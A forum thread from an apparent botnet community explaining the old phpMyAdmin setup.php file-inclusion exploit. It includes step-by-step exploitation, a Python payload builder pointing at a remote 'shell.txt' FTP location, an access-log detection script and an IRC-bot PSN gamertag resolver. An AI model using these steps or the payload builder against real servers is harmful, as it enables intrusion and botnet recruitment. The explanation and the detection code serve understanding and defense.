
Web Python The phpMyAdmin LFI exploit.

Austin
If you've spent time interested in the topic of botnets and DDoSing, odds are that if you've been around long enough you've heard of PMA.

What is PMA?
PMA is probably one of, if not the most, notable botnet exploits ever in existence, aside from a few other mentions like Mirai or qBot.
What is PMA? Well, it's just a short abbreviation for phpMyAdmin. Pretty obvious, right?

Anyhow, many may have exploited this vulnerability, and somehow many still did not and still don't understand what's actually happening to achieve this exploit, which contributed to an astronomical number of botnets throughout the years.

Let's start with what the exploit is and how it's an exploit. PMA started with a version of phpMyAdmin where, if the user used the automatic setup wizard, the setup.php file would execute and, like magic, they would have phpMyAdmin set up on their VPS easily. Sounds like a perfect world, and as we all know this is a perfect world.
So the main issue with this is that once the user had set up their VPS with the setup wizard, setup.php would execute without any sort of checks, and after the automatic setup your server happened to have a fantastic feature included called an RCE.

What's an LFI?
Local File Inclusion is, in the simplest terms imaginable... taking a file from your location of choice and uploading it locally (on the target device directly) onto a device via some sort of exploit.
So in this instance the initial setup directory had to still exist after setup was complete, and the config file in the setup scripts directory was exploitable: you could overwrite the config file with your "config" file and it would execute.

Getting into the PMA exploit...
So how this works is simple and annoying all at once.
Find a webserver with the vulnerable version of phpMyAdmin.
Once you've found the correct version, you'll then make sure the configuration directory is still available.
Now it gets a little dumb. You need a valid cookie when loading the config page.
Once you have that, if you look at lines 68-72 of the script you will notice these lines.

# percent-encode the remote (ftp) location by hand, one character at a time
ftpr0 = ftp.replace(".", "%2E")
ftpr1 = ftpr0.replace(":", "%3A")
ftpr = ftpr1.replace("/", "%2F")

Then there's that long payload string. The payload needed for this will be almost identical besides a few specific factors.
Next you need the token you got from the initial check of the webserver's configuration page.
You need the length of the FTP or remote location of the file you want uploaded.
So with that you'd need to count the string length, and into the payload it goes.
Then URL-encode everything and add it to the pre-encoded payload string.
(Like I said: other than the token and the file location length, the payload is copypasta.)
This is automated in the script below, but the headers get filled in from the data we grabbed from the configuration page, plus the payload string.
The POST request gets sent, and once that's sent the attacker checks for the correct response.

I never did this exploit justice, but this is really all it comes down to.
This exploit is all but dead at this point. I'm sure you could still find something, but that's bad, and it's from '09.

Edit: For anyone new or beginning in the world of pentesting or related fields: this is probably one of the more relevant vulnerabilities still found in the wild today.
This would be a combination of LFI (being able to see internal directories without proper sanitization), RFI (uploading a remote script file and having the server execute the file without checks), and unauthenticated RCE (executing the remote file upload). It's also a great example of URL exploiting, as the original exploit used URL encoding in the URL as well as some escapes to exploit LFI via directory traversal (i.e. ../../../../).

Future idiot totally didn't rewrite a perl script in python at all... That would be stupid.

[Click here to view this link]
 
Operating System
  1. Windows
  2. Linux
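The encoding steps the post walks through (percent-encoding the remote location, counting the length that goes into the payload, pulling the token and session cookie off the setup page, and assembling the POST body) as an added example. This is not the poster's script and not phpMyAdmin code; network I/O is left out so the logic can be checked offline. The form field names, the token input name and the sample page are assumptions or constructed data, and the serialized wrapper around the location is a one-element array rather than the full string the post calls "that long payload string", which is not reproduced here. The serializer is written for the general case (strings, ints, bools, lists and dicts), not just the one string the post counts.

```python
"""Encoding helpers for the phpMyAdmin setup.php payload described in the post.

Added example, not the poster's script.  Form field names, the token input
name and the sample page are assumptions / constructed data.
"""
import re
from urllib.parse import quote, urlencode

# ASSUMPTION: the setup page carries its anti-CSRF token in a hidden input.
TOKEN_RE = re.compile(r'name="token"\s+value="([0-9a-fA-F]+)"')
# First name=value pair of a Set-Cookie header, attributes dropped.
COOKIE_RE = re.compile(r"^\s*([^=;\s]+=[^;]+)")
# ASSUMPTION: form field names; substitute the ones your script posts.
TOKEN_FIELD = "token"
CONFIG_FIELD = "configuration"


def encode_location(location: str) -> str:
    """Percent-encode the remote location for use inside a URL or form body.

    The three lines quoted from the script hand-encode '.', ':' and '/'.
    quote(safe="") is the general form: every byte outside the unreserved
    set is escaped, so a user:pass@host part or a '?' in the path survives.
    '.' is unreserved and stays literal; decoders treat %2E identically.
    """
    return quote(location, safe="")


def php_serialize(value) -> str:
    """Serialize str/int/bool/list/dict the way PHP's serialize() does.

    The number the post says to count is the N in s:N:"...";.  PHP counts
    bytes, not characters, so a non-ASCII path needs len(s.encode()), and
    unserialize() rejects the whole string if N is off by even one.
    """
    if isinstance(value, bool):  # bool before int: True is an int in Python
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type: {type(value).__name__}")


def scrape_session(page_html: str, set_cookie: str) -> dict:
    """Token from the setup page plus the session cookie to send it back with."""
    token = TOKEN_RE.search(page_html)
    if not token:
        raise ValueError("no token on page: wrong version, or setup directory removed")
    cookie = COOKIE_RE.match(set_cookie or "")
    if not cookie:
        raise ValueError("server set no session cookie")
    return {"token": token.group(1), "cookie": cookie.group(1)}


def build_body(token: str, location: str) -> str:
    """Assemble the form body.

    Order matters: count the length on the raw location, wrap it in the
    serialized structure, then percent-encode the whole value once.
    Encoding first would make the count wrong ("ftp://" is 6 bytes,
    "ftp%3A%2F%2F" is 12).  The real script wraps the serialized string
    in more structure than the one-element array used here.
    """
    payload = php_serialize([location])  # a:1:{i:0;s:N:"<location>";}
    return urlencode({TOKEN_FIELD: token, CONFIG_FIELD: payload})


if __name__ == "__main__":
    # Constructed sample page and header, not captured from a real host.
    page = '<form><input type="hidden" name="token" value="0123456789abcdef0123456789abcdef"></form>'
    header = "phpMyAdmin=s3ss10n; path=/; HttpOnly"
    session = scrape_session(page, header)
    print(encode_location("ftp://203.0.113.5/shell.txt"))
    print(build_body(session["token"], "ftp://203.0.113.5/shell.txt"))
```

The practical check this gives you is the one the post glosses over: the length must be counted on the raw location, in bytes, before anything is percent-encoded, and the cookie from the GET has to travel with the POST or the token is rejected.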
nicholasbroo
I don't really know a lot about PHP / mIRC, but what I can say is this is pretty cool to read about, considering I'm a security researcher and haven't come across many web vulnerabilities.

It was a great read, as it holds fascinating information about how to protect yourself. Thanks Austin for this wonderful post!
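On the "how to protect yourself" side, the check a practitioner would want after reading the first post is a sweep of web server access logs for the traffic pattern it describes: probes and POSTs against the phpMyAdmin setup script, percent-encoded directory traversal (including double encoding), and remote URLs handed to a parameter. This is an added example, not code from the thread; the log lines are constructed with RFC 5737 addresses and the list of setup paths is an assumption to extend for your own install prefixes.

```python
"""Access-log detection for phpMyAdmin setup.php scanning and LFI/RFI probes.

Added example, not from the thread.  Log lines are constructed; the path
list is an assumption (add your own prefixes such as /pma/).
"""
import re
from urllib.parse import unquote

# Combined/common log format: ip ident user [ts] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SETUP_PATHS = ("/scripts/setup.php", "/setup/")  # ASSUMPTION: extend for your deployment
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
REMOTE_INCLUDE_RE = re.compile(r"=(?:ftp|https?)://", re.I)

# Constructed sample log; 198.51.100.7 is the scanner, 192.0.2.44 a normal visitor.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2009:13:55:36 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Oct/2009:13:55:37 +0000] "POST /phpmyadmin/scripts/setup.php HTTP/1.1" 200 64',
    '198.51.100.7 - - [10/Oct/2009:13:55:38 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 169',
    '203.0.113.9 - - [10/Oct/2009:13:56:01 +0000] "GET /index.php?page=ftp%3A%2F%2F203.0.113.9%2Fx.txt HTTP/1.1" 200 12',
    '192.0.2.44 - - [10/Oct/2009:13:56:02 +0000] "GET /index.php HTTP/1.1" 200 2048',
    '203.0.113.9 - - [10/Oct/2009:13:56:05 +0000] "GET /img.php?f=%252e%252e%252fetc%252fpasswd HTTP/1.1" 403 0',
]


def fully_decode(s: str, rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly so %252e%252e%252f is caught too."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyse(line: str):
    """Return a finding dict for a suspicious line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = fully_decode(m["target"])
    path, _, query = target.partition("?")
    reasons = []
    if any(p in path for p in SETUP_PATHS):
        # a GET is someone checking the directory still exists; a POST is the exploit attempt
        reasons.append("setup script " + ("POST" if m["method"] == "POST" else "probe"))
    if TRAVERSAL_RE.search(path) or TRAVERSAL_RE.search(query):
        reasons.append("directory traversal")
    if REMOTE_INCLUDE_RE.search(query):
        reasons.append("remote URL in parameter")
    if not reasons:
        return None
    return {"ip": m["ip"], "method": m["method"], "status": m["status"],
            "target": target, "reasons": reasons}


def scan(lines):
    """Run analyse() over an iterable of log lines; 1-based line numbers in the result."""
    findings = []
    for n, line in enumerate(lines, start=1):
        f = analyse(line)
        if f:
            f["line"] = n
            findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f'line {f["line"]}: {f["ip"]} {f["method"]} {f["target"]} -> {", ".join(f["reasons"])}')
```

A GET against the setup script is worth an alert on its own: it is the "make sure the configuration directory is still available" step from the first post, and the fix is to delete that directory after install, which is also what makes the following POST fail.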
 
Professional
PHP:
    // Resolves a PSN gamertag through a third-party lookup API and posts the result to the channel.
    function psnresolve($gamertag)
    {
        // urlencode keeps an unexpected '&' or space in the tag from rewriting the query string
        $portscan = file_get_contents("https://api.playstationresolver.xyz/?TYPE=RESOLVE_PSN&GAMERTAG=" . urlencode($gamertag));
        if ($portscan === false) {
            $this->privmsg($this->config['chan'], "[lookup failed]");
            return;
        }
        // str_replace returns the new string; the original discarded it, so the <br> tags were never replaced
        $portscan = str_replace("<br>", "-", $portscan);
        $this->privmsg($this->config['chan'], "[\2" . $portscan . "\2]");
    }
 
Austin
PHP:
    // Resolves a PSN gamertag through a third-party lookup API and posts the result to the channel.
    function psnresolve($gamertag)
    {
        // urlencode keeps an unexpected '&' or space in the tag from rewriting the query string
        $portscan = file_get_contents("https://api.playstationresolver.xyz/?TYPE=RESOLVE_PSN&GAMERTAG=" . urlencode($gamertag));
        if ($portscan === false) {
            $this->privmsg($this->config['chan'], "[lookup failed]");
            return;
        }
        // str_replace returns the new string; the original discarded it, so the <br> tags were never replaced
        $portscan = str_replace("<br>", "-", $portscan);
        $this->privmsg($this->config['chan'], "[\2" . $portscan . "\2]");
    }
Gross.
 
Jason Borne
What you have here are the stepping stones to something really, really cool. It goes to show you that keeping your webserver's files UP TO DATE is really, really important.
I will leave this for those curious minds: [Click here to view this link]
 
Austin
What you have here are the stepping stones to something really, really cool. It goes to show you that keeping your webserver's files UP TO DATE is really, really important.
I will leave this for those curious minds: [Click here to view this link]
Surprised this resp. has a ton of the old stuff that I figured was gone or forgotten, lol. What a throwback.
 